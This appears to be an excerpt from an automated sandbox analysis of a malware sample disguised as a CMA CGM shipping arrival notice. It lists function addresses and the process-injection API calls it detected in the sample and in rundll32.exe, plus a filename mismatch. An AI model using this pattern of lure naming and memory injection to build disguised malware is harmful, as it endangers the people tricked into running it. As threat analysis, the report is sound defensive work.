Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788F11 0_2_00788F11
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078BF01 0_2_0078BF01
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00781FFC 0_2_00781FFC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789FF4 0_2_00789FF4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00785FE4 0_2_00785FE4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00786FA9 0_2_00786FA9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789FAA 0_2_00789FAA
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E626E30 12_2_1E626E30
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63EBB0 12_2_1E63EBB0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6C1002 12_2_1E6C1002
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61841F 12_2_1E61841F
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61B090 12_2_1E61B090
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D1D55 12_2_1E6D1D55
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E600D20 12_2_1E600D20
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E624120 12_2_1E624120
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60F900 12_2_1E60F900
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61D5E0 12_2_1E61D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487B090 14_2_0487B090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921002 14_2_04921002
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487841F 14_2_0487841F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487D5E0 14_2_0487D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486F900 14_2_0486F900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04860D20 14_2_04860D20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04884120 14_2_04884120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04931D55 14_2_04931D55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04886E30 14_2_04886E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489EBB0 14_2_0489EBB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00802D88 14_2_00802D88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00802D90 14_2_00802D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00809E30 14_2_00809E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081CF93 14_2_0081CF93
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081CF96 14_2_0081CF96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00802FB0 14_2_00802FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: String function: 1E60B150 appears 32 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 0486B150 appears 32 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078F4F6 NtWriteVirtualMemory,LoadLibraryA, 0_2_0078F4F6
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B52A NtAllocateVirtualMemory, 0_2_0078B52A
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00793504 LoadLibraryA,NtSetContextThread, 0_2_00793504
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007875D7 NtWriteVirtualMemory,LoadLibraryA, 0_2_007875D7
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A83B NtWriteVirtualMemory,LoadLibraryA, 0_2_0078A83B
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00792D4E NtProtectVirtualMemory, 0_2_00792D4E
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078907D NtWriteVirtualMemory, 0_2_0078907D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A058 NtWriteVirtualMemory, 0_2_0078A058
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A03A NtWriteVirtualMemory, 0_2_0078A03A
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A0D4 NtWriteVirtualMemory, 0_2_0078A0D4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007890CD NtWriteVirtualMemory, 0_2_007890CD
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789144 NtWriteVirtualMemory, 0_2_00789144
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A135 NtWriteVirtualMemory, 0_2_0078A135
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A1B4 NtWriteVirtualMemory, 0_2_0078A1B4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A27C NtWriteVirtualMemory, 0_2_0078A27C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A250 NtWriteVirtualMemory, 0_2_0078A250
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789214 NtWriteVirtualMemory, 0_2_00789214
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007892D0 NtWriteVirtualMemory, 0_2_007892D0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007892B8 NtWriteVirtualMemory, 0_2_007892B8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007892B4 NtWriteVirtualMemory, 0_2_007892B4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789295 NtWriteVirtualMemory, 0_2_00789295
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078A364 NtWriteVirtualMemory, 0_2_0078A364
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789339 NtWriteVirtualMemory, 0_2_00789339
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007893A8 NtWriteVirtualMemory, 0_2_007893A8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789431 NtWriteVirtualMemory, 0_2_00789431
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007894B9 NtWriteVirtualMemory, 0_2_007894B9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B491 NtAllocateVirtualMemory, 0_2_0078B491
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789560 NtWriteVirtualMemory, 0_2_00789560
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789537 NtWriteVirtualMemory, 0_2_00789537
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B5BC NtAllocateVirtualMemory, 0_2_0078B5BC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789668 NtWriteVirtualMemory, 0_2_00789668
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B628 NtAllocateVirtualMemory, 0_2_0078B628
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007896E9 NtWriteVirtualMemory, 0_2_007896E9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B6A0 NtAllocateVirtualMemory, 0_2_0078B6A0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B71C NtAllocateVirtualMemory, 0_2_0078B71C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078B789 NtAllocateVirtualMemory, 0_2_0078B789
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789783 NtWriteVirtualMemory, 0_2_00789783
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078185B NtWriteVirtualMemory, 0_2_0078185B
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789829 NtWriteVirtualMemory, 0_2_00789829
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007898A0 NtWriteVirtualMemory, 0_2_007898A0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078991F NtWriteVirtualMemory, 0_2_0078991F
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078990D NtWriteVirtualMemory, 0_2_0078990D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007889FB NtWriteVirtualMemory, 0_2_007889FB
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007899BC NtWriteVirtualMemory, 0_2_007899BC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007889AC NtWriteVirtualMemory, 0_2_007889AC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788A7C NtWriteVirtualMemory, 0_2_00788A7C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789A21 NtWriteVirtualMemory, 0_2_00789A21
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788AE1 NtWriteVirtualMemory, 0_2_00788AE1
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789AC7 NtWriteVirtualMemory, 0_2_00789AC7
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789A94 NtWriteVirtualMemory, 0_2_00789A94
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789B7C NtWriteVirtualMemory, 0_2_00789B7C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788B54 NtWriteVirtualMemory, 0_2_00788B54
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789B14 NtWriteVirtualMemory, 0_2_00789B14
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789BF8 NtWriteVirtualMemory, 0_2_00789BF8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789C60 NtWriteVirtualMemory, 0_2_00789C60
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788C45 NtWriteVirtualMemory, 0_2_00788C45
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788CB8 NtWriteVirtualMemory, 0_2_00788CB8
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789CA0 NtWriteVirtualMemory, 0_2_00789CA0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078BD69 NtWriteVirtualMemory,LoadLibraryA, 0_2_0078BD69
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789D49 NtWriteVirtualMemory, 0_2_00789D49
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788D40 NtWriteVirtualMemory, 0_2_00788D40
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078DD10 NtWriteVirtualMemory, 0_2_0078DD10
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789DCC NtWriteVirtualMemory, 0_2_00789DCC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788DAD NtWriteVirtualMemory, 0_2_00788DAD
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789E69 NtWriteVirtualMemory, 0_2_00789E69
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788E29 NtWriteVirtualMemory, 0_2_00788E29
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789E00 NtWriteVirtualMemory, 0_2_00789E00
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00785EAC NtWriteVirtualMemory,LoadLibraryA, 0_2_00785EAC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788EA0 NtWriteVirtualMemory, 0_2_00788EA0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788F7D NtWriteVirtualMemory, 0_2_00788F7D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789F54 NtWriteVirtualMemory, 0_2_00789F54
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00788F11 NtWriteVirtualMemory, 0_2_00788F11
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789FF4 NtWriteVirtualMemory, 0_2_00789FF4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00789FAA NtWriteVirtualMemory, 0_2_00789FAA
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649660 NtAllocateVirtualMemory,LdrInitializeThunk, 12_2_1E649660
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649A50 NtCreateFile,LdrInitializeThunk, 12_2_1E649A50
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649A20 NtResumeThread,LdrInitializeThunk, 12_2_1E649A20
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649A00 NtProtectVirtualMemory,LdrInitializeThunk, 12_2_1E649A00
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6496E0 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_1E6496E0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649710 NtQueryInformationToken,LdrInitializeThunk, 12_2_1E649710
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6497A0 NtUnmapViewOfSection,LdrInitializeThunk, 12_2_1E6497A0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649780 NtMapViewOfSection,LdrInitializeThunk, 12_2_1E649780
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649860 NtQuerySystemInformation,LdrInitializeThunk, 12_2_1E649860
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649840 NtDelayExecution,LdrInitializeThunk, 12_2_1E649840
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6498F0 NtReadVirtualMemory,LdrInitializeThunk, 12_2_1E6498F0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649540 NtReadFile,LdrInitializeThunk, 12_2_1E649540
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649910 NtAdjustPrivilegesToken,LdrInitializeThunk, 12_2_1E649910
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6499A0 NtCreateSection,LdrInitializeThunk, 12_2_1E6499A0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649670 NtQueryInformationProcess, 12_2_1E649670
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649650 NtQueryValueKey, 12_2_1E649650
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649610 NtEnumerateValueKey, 12_2_1E649610
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649A10 NtQuerySection, 12_2_1E649A10
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6496D0 NtCreateKey, 12_2_1E6496D0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649A80 NtOpenDirectoryObject, 12_2_1E649A80
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649760 NtOpenProcess, 12_2_1E649760
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649770 NtSetInformationFile, 12_2_1E649770
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E64A770 NtOpenThread, 12_2_1E64A770
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649730 NtQueryVirtualMemory, 12_2_1E649730
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649B00 NtSetValueKey, 12_2_1E649B00
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E64A710 NtOpenProcessToken, 12_2_1E64A710
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649FE0 NtCreateMutant, 12_2_1E649FE0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E64A3B0 NtGetContextThread, 12_2_1E64A3B0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E64B040 NtSuspendThread, 12_2_1E64B040
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649820 NtEnumerateKey, 12_2_1E649820
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6498A0 NtWriteVirtualMemory, 12_2_1E6498A0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649560 NtWriteFile, 12_2_1E649560
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649950 NtQueueApcThread, 12_2_1E649950
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E649520 NtWaitForSingleObject, 12_2_1E649520
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E64AD30 NtSetContextThread, 12_2_1E64AD30
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6495F0 NtQueryInformationFile, 12_2_1E6495F0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6499D0 NtCreateProcessEx, 12_2_1E6499D0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6495D0 NtClose, 12_2_1E6495D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9840 NtDelayExecution,LdrInitializeThunk, 14_2_048A9840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9860 NtQuerySystemInformation,LdrInitializeThunk, 14_2_048A9860
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A99A0 NtCreateSection,LdrInitializeThunk, 14_2_048A99A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A95D0 NtClose,LdrInitializeThunk, 14_2_048A95D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 14_2_048A9910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9540 NtReadFile,LdrInitializeThunk, 14_2_048A9540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A96D0 NtCreateKey,LdrInitializeThunk, 14_2_048A96D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 14_2_048A96E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9650 NtQueryValueKey,LdrInitializeThunk, 14_2_048A9650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9A50 NtCreateFile,LdrInitializeThunk, 14_2_048A9A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9660 NtAllocateVirtualMemory,LdrInitializeThunk, 14_2_048A9660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9780 NtMapViewOfSection,LdrInitializeThunk, 14_2_048A9780
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9FE0 NtCreateMutant,LdrInitializeThunk, 14_2_048A9FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9710 NtQueryInformationToken,LdrInitializeThunk, 14_2_048A9710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A98A0 NtWriteVirtualMemory, 14_2_048A98A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A98F0 NtReadVirtualMemory, 14_2_048A98F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9820 NtEnumerateKey, 14_2_048A9820
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048AB040 NtSuspendThread, 14_2_048AB040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A99D0 NtCreateProcessEx, 14_2_048A99D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A95F0 NtQueryInformationFile, 14_2_048A95F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9520 NtWaitForSingleObject, 14_2_048A9520
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048AAD30 NtSetContextThread, 14_2_048AAD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9950 NtQueueApcThread, 14_2_048A9950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9560 NtWriteFile, 14_2_048A9560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9A80 NtOpenDirectoryObject, 14_2_048A9A80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9A00 NtProtectVirtualMemory, 14_2_048A9A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9610 NtEnumerateValueKey, 14_2_048A9610
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9A10 NtQuerySection, 14_2_048A9A10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9A20 NtResumeThread, 14_2_048A9A20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9670 NtQueryInformationProcess, 14_2_048A9670
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A97A0 NtUnmapViewOfSection, 14_2_048A97A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048AA3B0 NtGetContextThread, 14_2_048AA3B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9B00 NtSetValueKey, 14_2_048A9B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048AA710 NtOpenProcessToken, 14_2_048AA710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9730 NtQueryVirtualMemory, 14_2_048A9730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9760 NtOpenProcess, 14_2_048A9760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9770 NtSetInformationFile, 14_2_048A9770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048AA770 NtOpenThread, 14_2_048AA770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00819D50 NtCreateFile, 14_2_00819D50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00819E80 NtClose, 14_2_00819E80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00819E00 NtReadFile, 14_2_00819E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00819F30 NtAllocateVirtualMemory, 14_2_00819F30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00819DFA NtReadFile, 14_2_00819DFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00819D4A NtCreateFile, 14_2_00819D4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00819F2A NtAllocateVirtualMemory, 14_2_00819F2A
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929592552.0000000002A30000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesmedesvende.exeFE2XKareo vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000000.661545013.0000000000448000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesmedesvende.exe vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258380873.00000000000D9000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
